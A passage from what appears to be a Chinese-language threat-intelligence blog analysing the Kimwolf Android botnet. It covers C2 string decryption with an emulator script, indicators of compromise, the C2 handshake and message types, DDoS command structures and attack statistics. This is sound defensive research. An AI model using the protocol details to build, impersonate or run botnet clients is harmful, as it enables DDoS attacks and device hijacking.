<p>&#x603B;&#x4F53;&#x6765;&#x8BF4;&#xFF0C;Kimwolf&#x7684;&#x529F;&#x80FD;&#x5E76;&#x4E0D;&#x590D;&#x6742;&#xFF0C;&#x4E0B;&#x6587;&#x5C06;&#x4EE5;12&#x6708;9&#x65E5;&#x6355;&#x83B7;&#x7684;&#x6837;&#x672C;&#x4E3A;&#x4E3B;&#x8981;&#x5206;&#x6790;&#x5BF9;&#x8C61;&#xFF0C;&#x4ECE;<strong>&#x5B57;&#x4E32;&#x89E3;&#x5BC6;&#xFF0C;&#x5355;&#x4E00;&#x5B9E;&#x4F8B;&#xFF0C;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;</strong>&#x7B49;&#x65B9;&#x9762;&#x5256;&#x6790;Kimwolf&#x7684;&#x6280;&#x672F;&#x7EC6;&#x8282;&#x3002;</p>
<pre><code>MD5:3e1377869bd6e80e005b71b9e991c060
MAGIC:ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
PACKER: UPX
</code></pre>
<h2 id="%E5%AD%97%E4%B8%B2%E8%A7%A3%E5%AF%86">&#x5B57;&#x4E32;&#x89E3;&#x5BC6;</h2>
<p>Kimwolf&#x4F7F;&#x7528;&#x7B80;&#x5355;&#x7684;&#x6808;&#x5F02;&#x6216;&#xFF08;Stack XOR&#xFF09;&#x64CD;&#x4F5C;&#x5BF9;C2&#xFF0C; DNS Resolver&#x7B49;&#x654F;&#x611F;&#x6570;&#x636E;&#x8FDB;&#x884C;&#x52A0;&#x5BC6;&#x3002;IDA&#x53CD;&#x7F16;&#x8BD1;&#x7684;&#x4F2A;&#x7801;&#x4E2D;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x5927;&#x91CF;&#x7C7B;&#x4F3C;&#x7684;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#xFF0C;veorq_s64&#x662F;8&#x5B57;&#x8282;&#x7684;&#x5F02;&#x6216;&#x6307;&#x4EE4;&#xFF0C;&#x6240;&#x4EE5;&#x8BF4;&#x89E3;&#x5BC6;&#x5F88;&#x7B80;&#x5355;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x6B63;&#x5219;&#x63D0;&#x53D6;&#x51FA;&#x64CD;&#x4F5C;&#x6570;&#xFF0C;&#x7136;&#x540E;&#x8FDB;&#x884C;&#x5F02;&#x6216;&#x5373;&#x53EF;&#xFF0C;&#x4E0B;&#x56FE;&#x793A;&#x4F8B;&#x4E2D;v63&#x89E3;&#x5BC6;&#x7684;&#x5185;&#x5BB9;&#x6B63;&#x662F;C2 <code>staging.pproxy1[.]fun</code></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_xor.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>&#x76F8;&#x4FE1;&#x5C1D;&#x8BD5;&#x8FC7;&#x624B;&#x52A8;&#x89E3;&#x5BC6;&#x7684;&#x8BFB;&#x8005;&#x90FD;&#x4F1A;&#x89C9;&#x5F97;&#x8FD9;&#x975E;&#x5E38;&#x4E0D;&#x65B9;&#x4FBF;&#xFF0C;&#x4F1A;&#x95EE;&#x6709;&#x6CA1;&#x6709;&#x66F4;&#x9AD8;&#x6548;&#x7684;&#x65B9;&#x6CD5;&#x5462;&#xFF1F;&#x7B54;&#x6848;&#x662F;&#x80AF;&#x5B9A;&#x7684;&#xFF0C;&#x7A0D;&#x52A0;&#x89C2;&#x5BDF;&#x4E0A;&#x56FE;&#x7684;&#x4EE3;&#x7801;&#x7247;&#x6BB5;&#xFF0C;&#x53EF;&#x77E5;&#x89E3;&#x5BC6;&#x540E;&#x7684;C2&#x5B57;&#x4E32;&#x662F;&#x51FD;&#x6570;sub_8F00&#x7684;&#x7B2C;2&#x4E2A;&#x53C2;&#x6570;&#x3002;&#x6839;&#x636E;&#x8FD9;&#x4E2A;&#x7279;&#x70B9;&#xFF0C;&#x53EF;&#x4EE5;&#x501F;&#x52A9;&#x6A21;&#x62DF;&#x5668;&#x5B9E;&#x73B0;C2&#x7684;&#x6279;&#x91CF;&#x81EA;&#x52A8;&#x89E3;&#x5BC6;&#x3002;</p>
<pre><code>import flare_emu

eh=flare_emu.EmuHelper()
def iterateHook(eh, address, argv, userData):
   
    if eh.isValidEmuPtr(argv[1]):
        buf=eh.getEmuString(eh.getRegVal(&apos;R1&apos;))
        print(f&quot;0x{address:x} ---&gt; {buf}&quot;)

eh.iterate(0x00008F00,iterateHook)
</code></pre>
<p>&#x6700;&#x7EC8;&#x6548;&#x679C;&#x5982;&#x4E0B;&#xFF0C;&#x6210;&#x529F;&#x89E3;&#x5BC6;&#x51FA;6&#x4E2A;C2&#xFF1A;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_decryption.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"><br>
veorq_s64&#x7684;&#x6307;&#x4EE4;&#x7801;&#x4E3A;<code>VEOR            Q8, Q8, Q9</code>&#xFF0C;&#x901A;&#x8FC7;&#x5B83;&#x53EF;&#x4EE5;&#x5B9A;&#x4F4D;&#x6240;&#x6709;&#x52A0;&#x5BC6;&#x5B57;&#x4E32;&#x6240;&#x5728;&#x7684;&#x51FD;&#x6570;&#x3002;&#x518D;&#x6839;&#x636E;&#x5728;&#x4E0D;&#x540C;&#x51FD;&#x6570;&#x6240;&#x5448;&#x73B0;&#x7684;&#x6A21;&#x5F0F;&#xFF0C;&#x5229;&#x7528;flare_emu&#x7684;iterate&#x6216;emulateRange&#x5C31;&#x80FD;&#x65B9;&#x4FBF;&#x7684;&#x5B9E;&#x73B0;&#x89E3;&#x5BC6;&#x6240;&#x6709;&#x654F;&#x611F;&#x5B57;&#x4E32;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_pattern.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h2 id="%E5%8D%95%E4%B8%80%E5%AE%9E%E4%BE%8B">&#x5355;&#x4E00;&#x5B9E;&#x4F8B;</h2>
<p>Kimwolf&#x5C06;&#x81EA;&#x8EAB;&#x8FDB;&#x7A0B;&#x540D;&#x4F2A;&#x88C5;&#x4E3A;netd_services&#x6216;tv_helper&#xFF0C;&#x5E76;&#x4F7F;&#x7528;&#x540D;&#x4E3A;<code>@niggaboxv[&#x6570;&#x5B57;]</code>&#x7684;Unix&#x57DF;socket&#x5B9E;&#x73B0;&#x5355;&#x4E00;&#x5B9E;&#x4F8B;&#x63A7;&#x5236;&#x3002;&#x8FD9;&#x4E00;&#x7EC4;&#x5408;&#x7279;&#x5F81;&#x53EF;&#x4F5C;&#x4E3A;&#x9AD8;&#x7F6E;&#x4FE1;&#x5EA6;&#x611F;&#x67D3;&#x6307;&#x6807;&#x7528;&#x4E8E;&#x8BBE;&#x5907;&#x6392;&#x67E5;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_unix.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h2 id="%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE">&#x7F51;&#x7EDC;&#x534F;&#x8BAE;</h2>
<p>Kimwolf&#x7684;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x59CB;&#x7EC8;&#x91C7;&#x7528;TLS&#x52A0;&#x5BC6;&#x3002;&#x65E9;&#x671F;&#x7248;&#x672C;&#x4E2D;&#xFF0C;&#x5E94;&#x7528;&#x5C42;&#x534F;&#x8BAE;&#x76F4;&#x63A5;&#x627F;&#x8F7D;&#x4E8E;TLS&#x96A7;&#x9053;&#xFF1B;&#x5728;&#x5F53;&#x524D;&#x7248;&#x672C;&#x4E2D;&#xFF0C;&#x5728;&#x53D1;&#x9001;register&#x6D88;&#x606F;&#x4E4B;&#x524D;&#x8FD8;&#x4F1A;&#x8FDB;&#x884C;websocket&#x63E1;&#x624B;&#xFF0C;&#x4F46;&#x540E;&#x7EED;&#x5E76;&#x6CA1;&#x6709;&#x4F7F;&#x7528;&#x8BE5;&#x534F;&#x8BAE;&#x3002;&#x5B83;&#x7684;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x62A5;&#x6587;&#x9075;&#x5FAA;&#x201C;Header + Body&#x201D;&#x7684;&#x56FA;&#x5B9A;&#x683C;&#x5F0F;&#x3002;&#x5728;Header&#x4E2D;&#xFF0C;Reserved&#x5B57;&#x6BB5;&#x4E3A;&#x56FA;&#x5B9A;&#x503C;1&#xFF0C;&#x800C;Magic&#x5219;&#x662F;&#x5DF2;&#x8FED;&#x4EE3;&#x53D8;&#x66F4;&#x4E09;&#x6B21;&#xFF0C;&#x5F53;&#x524D;&#x7248;&#x672C;&#x4E3A;&#x201C;AD216CD4&#x201D;&#xFF1B;Body&#x90E8;&#x5206;&#x5219;&#x662F;&#x4E0D;&#x540C;&#x7684;&#x529F;&#x80FD;&#x6709;&#x4E0D;&#x540C;&#x7684;&#x7ED3;&#x6784;&#x3002;</p>
<pre><code>type Header struct {
	Magic    [4]byte   // &quot;DPRK&quot; -&gt; &quot;FD9177FF&quot; -&gt; &quot;AD216CD4&quot;
	Reserved uint8    //1 
	MsgType  uint8
	MsgID    uint32
	BodyLen  uint32
	CRC32    uint32
}
</code></pre>
<p>MsgType&#x5B57;&#x6BB5;&#x5219;&#x662F;&#x7528;&#x4E8E;&#x8BF4;&#x660E;&#x6D88;&#x606F;&#x7C7B;&#x578B;&#xFF0C;&#x5B83;&#x7684;&#x53D6;&#x503C;&#x53CA;&#x5BF9;&#x5E94;&#x7684;&#x529F;&#x80FD;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>MsgType</th>
<th>desc</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>register</td>
</tr>
<tr>
<td>1</td>
<td>verify</td>
</tr>
<tr>
<td>2</td>
<td>confirm</td>
</tr>
<tr>
<td>3</td>
<td>heartbeat</td>
</tr>
<tr>
<td>4</td>
<td>reconnect</td>
</tr>
<tr>
<td>5</td>
<td>tcp proxy</td>
</tr>
<tr>
<td>6</td>
<td>udp proxy</td>
</tr>
<tr>
<td>7</td>
<td>reverse shell</td>
</tr>
<tr>
<td>8</td>
<td>cmd execute</td>
</tr>
<tr>
<td>9</td>
<td>write file</td>
</tr>
<tr>
<td>10</td>
<td>read file</td>
</tr>
<tr>
<td>12</td>
<td>ddos attack</td>
</tr>
</tbody>
</table>
<p>Bot&#x4E0E;C2&#x670D;&#x52A1;&#x5668;&#x4E4B;&#x95F4;&#x7684;&#x901A;&#x4FE1;&#x521D;&#x59CB;&#x5316;&#x91C7;&#x7528;&#x4E00;&#x79CD;&#x4E09;&#x9636;&#x6BB5;&#x63E1;&#x624B;&#x673A;&#x5236;&#x3002;&#x53CC;&#x65B9;&#x5FC5;&#x987B;&#x987A;&#x5E8F;&#x5B8C;&#x6210;<code>register</code>&#x3001;<code>verify</code>&#x3001;<code>confirm</code>&#x4E09;&#x6B21;&#x4EA4;&#x4E92;&#xFF0C;&#x5B9E;&#x73B0;&#x53CC;&#x5411;&#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;&#x540E;&#xFF0C;&#x624D;&#x88AB;&#x89C6;&#x4E3A;&#x5EFA;&#x7ACB;&#x53EF;&#x4FE1;&#x4F1A;&#x8BDD;&#x3002;<br>
&#x63A5;&#x4E0B;&#x6765;&#xFF0C;&#x8BA9;&#x6211;&#x4EEC;&#x4EE5;&#x5B9E;&#x9645;&#x4EA7;&#x751F;&#x7684;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x6765;&#x89E3;&#x91CA;Bot&#x4E0E;C2&#x7684;&#x4EA4;&#x4E92;&#x8FC7;&#x7A0B;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_traffic.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h4 id="step1-register-botc2">Step1: Register, Bot ---&gt; C2</h4>
<p>Bot&#x5411;C2 &#x53D1;&#x9001;&#x4FE9;&#x6B21;18&#x5B57;&#x8282;&#x7684;Header&#xFF0C;&#x5176;&#x4E2D;MsgType&#x4E3A;0&#xFF0C;MsgID&#xFF0C;BodyLen&#xFF0C;CRC32&#x5B57;&#x6BB5;&#x5747;&#x4E3A;0&#xFF0C;Magic&#x4E3A;<code>FD9177FF</code> &#x3002;</p>
<h4 id="step2-varify-c2bot">Step2: Varify, C2 ---&gt; Bot</h4>
<p>C2&#x4F7F;&#x7528;&#x79C1;&#x94A5;&#x5BF9;&#x968F;&#x673A;&#x6D88;&#x606F;&#x751F;&#x6210;&#x692D;&#x5706;&#x66F2;&#x7EBF;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#xFF0C;&#x5E76;&#x6309;&#x4EE5;&#x4E0B;&#x683C;&#x5F0F;&#x6784;&#x5EFA;&#x62A5;&#x6587;Body&#x90E8;&#x5206;&#x3002;</p>
<pre><code>type VerifyBody struct {
	MsgLen uint32
	Msg    []byte
	SigLen uint32
	Sig    []byte
}
</code></pre>
<p>&#x793A;&#x4F8B;&#x4E2D;Body&#x6309;&#x4E0A;&#x8FF0;&#x7ED3;&#x6784;&#x4F53;&#x8FDB;&#x884C;&#x89E3;&#x6790;&#x53EF;&#x77E5;&#xFF1A;</p>
<ul>
<li>
<p>MsgLen&#x4E3A;4&#x5B57;&#x8282;</p>
</li>
<li>
<p>Msg&#x4E3A;<code> xx xx xx xx</code></p>
</li>
<li>
<p>SigLen&#x4E3A;0x47&#x5B57;&#x8282;</p>
</li>
<li>
<p>&#x7B7E;&#x540D;</p>
</li>
</ul>
<pre><code>  #Signature
  
  00000000  30 45 02 20 14 ca ab 58 4d 88 b7 e2 26 f2 a0 80  |0E. .&#xCA;&#xAB;XM.&#xB7;&#xE2;&amp;&#xF2;&#xA0;.|
  00000010  49 22 c9 b0 98 9e f4 2b f9 01 8e 4c 20 71 ed 17  |I&quot;&#xC9;&#xB0;..&#xF4;+&#xF9;..L q&#xED;.|
  00000020  cc 57 b6 b4 02 21 00 e0 c7 92 cb 28 d8 c9 d7 66  |&#xCC;W&#xB6;&#xB4;.!.&#xE0;&#xC7;.&#xCB;(&#xD8;&#xC9;&#xD7;f|
  00000030  4f 1b d0 80 b8 35 26 dd 68 65 93 f2 69 13 13 e8  |O.&#xD0;.&#xB8;5&amp;&#xDD;he.&#xF2;i..&#xE8;|
  00000040  42 bd a7 6d a8 04 92                             |B&#xBD;&#xA7;m&#xA8;..|
</code></pre>
<p>&#x5F53;Bot&#x6536;&#x5230;Verify&#x62A5;&#x6587;&#x65F6;&#xFF0C;&#x4F1A;&#x4F7F;&#x7528;&#x786C;&#x7F16;&#x7801;&#x7684;&#x516C;&#x94A5;&#x9A8C;&#x7B7E;&#x3002;&#x9A8C;&#x8BC1;&#x901A;&#x8FC7;&#x540E;&#x5373;&#x8FDB;&#x5165;&#x6700;&#x7EC8;&#x7684;Confirm&#x9636;&#x6BB5;&#x3002;Kimwolf&#x7684;&#x4F5C;&#x8005;&#x8BBE;&#x8BA1;&#x8FD9;&#x4E00;&#x673A;&#x5236;&#xFF0C;&#x672C;&#x610F;&#x662F;&#x4FDD;&#x62A4;&#x5176;C2&#x7F51;&#x7EDC;&#x4E0D;&#x88AB;&#x4ED6;&#x4EBA;&#x63A5;&#x7BA1;&#x3002;</p>
<pre><code># Publickey

00000000  30 59 30 13 06 07 2a 86 48 ce 3d 02 01 06 08 2a  |0Y0...*.H&#xCE;=....*|
00000010  86 48 ce 3d 03 01 07 03 42 00 04 ed 6a a0 57 2d  |.H&#xCE;=....B..&#xED;j&#xA0;W-|
00000020  53 02 ce 35 cc 0a 04 93 2d b4 86 c9 a8 e2 93 f5  |S.&#xCE;5&#xCC;...-&#xB4;.&#xC9;&#xA8;&#xE2;.&#xF5;|
00000030  69 07 86 0f 99 42 4b a6 5c 12 7a e7 12 48 56 ad  |i....BK&#xA6;\.z&#xE7;.HV.|
00000040  34 b5 ae 92 ec 98 c9 bc e1 d8 15 dc 6e 1c 59 1b  |4&#xB5;&#xAE;.&#xEC;.&#xC9;&#xBC;&#xE1;&#xD8;.&#xDC;n.Y.|
00000050  be 96 b8 a9 5b 95 46 34 19 5a d2                 |&#xBE;.&#xB8;&#xA9;[.F4.Z&#xD2;|
</code></pre>
<h4 id="step3-confirm-botc2">Step3: Confirm, Bot -&gt; C2</h4>
<p>Bot&#x5C06;&#x8FD0;&#x884C;&#x65F6;&#x4F20;&#x5165;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x505A;&#x4E3A;&#x5206;&#x7EC4;&#x6807;&#x8BC6;&#xFF0C;&#x5E76;&#x6309;&#x7167;GroupBody&#x7ED3;&#x6784;&#x8FDB;&#x884C;&#x6784;&#x9020;&#xFF0C;&#x4E0A;&#x62A5;&#x7ED9;C2&#x3002;&#x793A;&#x4F8B;&#x4F7F;&#x7528;&#x7684;&#x5206;&#x7EC4;&#x5B57;&#x4E32;&#x4E3A;&#x201C;android-postboot-rt&#x201C;&#x3002;</p>
<pre><code>type GroupBody struct {
	MsgLen uint32
	Group    []byte
}
</code></pre>
<h4 id="step3-confirm-c2bot">Step3 : Confirm, C2 -&gt; BOT</h4>
<p>C2&#x670D;&#x52A1;&#x5668;&#x5728;&#x6536;&#x5230;Bot&#x7684;Confirm&#x62A5;&#x6587;&#x540E;&#xFF0C;&#x4F1A;&#x67E5;&#x9A8C;&#x5176;&#x6240;&#x5C5E;&#x5206;&#x7EC4;&#x662F;&#x5426;&#x5DF2;&#x9884;&#x5148;&#x5728;&#x6D3B;&#x52A8;&#x4E2D;&#x542F;&#x7528;&#x3002;&#x82E5;&#x5339;&#x914D;&#x6210;&#x529F;&#xFF0C;&#x5219;&#x786E;&#x8BA4;&#x8BE5;Bot&#x8EAB;&#x4EFD;&#x5408;&#x6CD5;&#xFF0C;&#x5E76;&#x5411;&#x5176;&#x56DE;&#x4F20;&#x4E00;&#x4E2A;Confirm&#x54CD;&#x5E94;&#x62A5;&#x6587;&#x3002;&#x8BE5;&#x54CD;&#x5E94;&#x62A5;&#x6587;&#x7684;MsgType&#x5B57;&#x6BB5;&#x503C;&#x4E3A;2&#xFF0C;&#x4E14;MsgID&#x3001;BodyLen&#x3001;CRC32&#x5B57;&#x6BB5;&#x5747;&#x7F6E;&#x4E3A;0&#x3002;</p>
<p>&#x7ECF;&#x8FC7;&#x4EE5;&#x4E0A;&#x6D41;&#x7A0B;&#x4E4B;&#x540E;&#xFF0C;Bot&#x548C;C2&#x624D;&#x7B97;&#x5B8C;&#x6210;&#x53CC;&#x5B8C;&#x8EAB;&#x4EFD;&#x7684;&#x8BA4;&#x8BC1;&#xFF0C;Bot&#x5F00;&#x59CB;&#x7B49;&#x5F85;&#x6267;&#x884C;C2&#x53D1;&#x4E0B;&#x7684;&#x6307;&#x4EE4;&#x3002;&#x5F53;&#x6307;&#x4EE4;&#x53F7;&#x662F;12&#x65F6;&#xFF0C;Kimwolf&#x6267;&#x884C;DDoS&#x76F8;&#x5173;&#x529F;&#x80FD;&#xFF0C;&#x76F8;&#x4FE1;&#x719F;&#x6089;Mirai&#x7684;&#x8BFB;&#x8005;&#x770B;&#x5230;DDoSBody&#x7684;&#x80AF;&#x5B9A;&#x4F1A;&#x5FC3;&#x4E00;&#x7B11;&#xFF0C;&#x8BE5;&#x7ED3;&#x6784;&#x6B63;&#x662F;&#x6E90;&#x4E8E;Mirai&#x3002;</p>
<pre><code>Type DDoSBody struct {
	AtkID     uint32
	AtkType   uint8
	Duration  uint32
	TargetCnt uint32
	Targets   []Target
	FlagCnt   uint32
	Flags     []Flag
}
</code></pre>
<p>&#x4EE5;&#x4E0B;&#x4E3A;Kimwolf&#x652F;&#x6301;&#x7684;13&#x79CD;DDoS &#x653B;&#x51FB;&#x65B9;&#x6CD5;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_vector.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h1 id="%E6%8C%87%E4%BB%A4%E8%B7%9F%E8%B8%AA">&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;</h1>
<p>&#x4ECE;Xlab&#x7684;&#x6570;&#x636E;&#x770B;Kimwolf&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x4E3B;&#x8981;&#x6307;&#x4EE4;&#x662F;&#x5229;&#x7528;Bot&#x8282;&#x70B9;&#x63D0;&#x4F9B;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#xFF0C;&#x5360;&#x6240;&#x6709;&#x6307;&#x4EE4;&#x7684;96.5%&#x3002;&#x5176;&#x4F59;&#x4E3A;DDoS&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x3002;DDoS&#x653B;&#x51FB;&#x76EE;&#x6807;&#x904D;&#x5E03;&#x5168;&#x7403;&#x5404;&#x4E2A;&#x884C;&#x4E1A;&#x3002;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x4E3B;&#x8981;&#x96C6;&#x4E2D;&#x5728;&#x7F8E;&#x56FD;&#x3001;&#x4E2D;&#x56FD;&#x3001;&#x6CD5;&#x56FD;&#x3001;&#x5FB7;&#x56FD;&#x3001;&#x52A0;&#x62FF;&#x5927;&#x7B49;&#x5730;&#x533A;&#x3002;</p>
<figure style="text-align:center;">
  <img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf.cmd.type.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" style="width:100%;">
  <figcaption>&#x6307;&#x4EE4;&#x7C7B;&#x578B;&#x5206;&#x5E03;</figcaption>
</figure>
<h2 id="%E8%BF%B7%E4%B9%8B%E6%94%BB%E5%87%BB%EF%BC%8C3%E5%A4%A917%E4%BA%BF">&#x8FF7;&#x4E4B;&#x653B;&#x51FB;&#xFF0C;3&#x5929;17&#x4EBF;</h2>
<p>11&#x6708;19&#x65E5;&#x5230;22&#x65E5;&#xFF0C;Kimwolf&#x5728;&#x77ED;&#x77ED;&#x7684;3&#x5929;&#x65F6;&#x95F4;&#x5185;&#xFF0C;&#x4E0B;&#x53D1;&#x4E86;&#x9AD8;&#x8FBE;<strong>17&#x4EBF;&#x6761;&#x6307;&#x4EE4;</strong>&#xFF0C;&#x968F;&#x673A;&#x653B;&#x51FB;&#x5168;&#x7403;&#x5927;&#x91CF;IP&#x5730;&#x5740;&#x3002;&#x6211;&#x4EEC;&#x4E0D;&#x6E05;&#x695A;&#x5B83;&#x4E3A;&#x4EC0;&#x4E48;&#x4F1A;&#x6709;&#x8FD9;&#x79CD;&#x8BA9;&#x4EBA;&#x8FF7;&#x60D1;&#x7684;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF0C;&#x56E0;&#x4E3A;&#x8FD9;&#x4E9B;&#x653B;&#x51FB;&#x53EF;&#x80FD;&#x4E5F;&#x65E0;&#x6CD5;&#x5BF9;&#x76EE;&#x6807;&#x5730;&#x5740;&#x9020;&#x6210;&#x5B9E;&#x8D28;&#x6027;&#x7684;&#x4F24;&#x5BB3;&#x3002;&#x751A;&#x81F3;&#x4E00;&#x5EA6;&#x6000;&#x7591;&#x662F;&#x4E0D;&#x662F;&#x6211;&#x4EEC;&#x81EA;&#x5DF1;&#x4EA7;&#x751F;&#x7684;BUG&#x5BFC;&#x81F4;&#x4E86;&#x8FD9;&#x4E9B;&#x5F02;&#x5E38;&#x3002;&#x76F4;&#x5230;&#x4E0E;&#x6211;&#x4EEC;&#x591A;&#x5BB6;&#x5934;&#x90E8;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x8FDB;&#x884C;&#x6570;&#x636E;&#x6838;&#x9A8C;&#x540E;&#xFF0C;&#x624D;&#x6700;&#x7EC8;&#x786E;&#x8BA4;&#x2014;&#x2014;Kimwolf &#x5C31;&#x662F;&#x8FD9;&#x4E48;&#x75AF;&#x72C2;&#xFF0C;&#x5B83;&#x786E;&#x5B9E;&#x662F;&#x626B;&#x5C04;&#x4E86;&#x6574;&#x4E2A;&#x4E92;&#x8054;&#x7F51;&#x3002;</p>
<figure style="text-align:center;">
  <img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_1.1Billion.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" style="width:100%;">
  <figcaption>DDoS&#x653B;&#x51FB;&#x8D8B;&#x52BF;</figcaption>
</figure>
<h2 id="%E5%9A%A3%E5%BC%A0%E7%9A%84%E6%94%BB%E5%87%BBpayload">&#x56A3;&#x5F20;&#x7684;&#x653B;&#x51FB;Payload</h2>
<p>Kimwolf&#x65F6;&#x5E38;&#x5728;DDoS&#x7684;Payload&#x4E2D;&#x5939;&#x5E26;&#x5404;&#x79CD;&#x5632;&#x7B11;&#xFF0C;&#x6311;&#x8845;&#xFF0C;&#x751A;&#x81F3;&#x52D2;&#x7D22;&#x4FE1;&#x606F;&#x3002;</p>
<ul>
<li>&#x5632;&#x8BBD;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_bad_cmd_2.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<ul>
<li>&#x6311;&#x8845;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_bad_cmd_1.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<ul>
<li>&#x52D2;&#x7D22;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_ransom_cmd.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h1 id="%E9%A2%9D%E5%A4%96%E7%9A%84%E7%BB%84%E4%BB%B6">&#x989D;&#x5916;&#x7684;&#x7EC4;&#x4EF6;</h1>
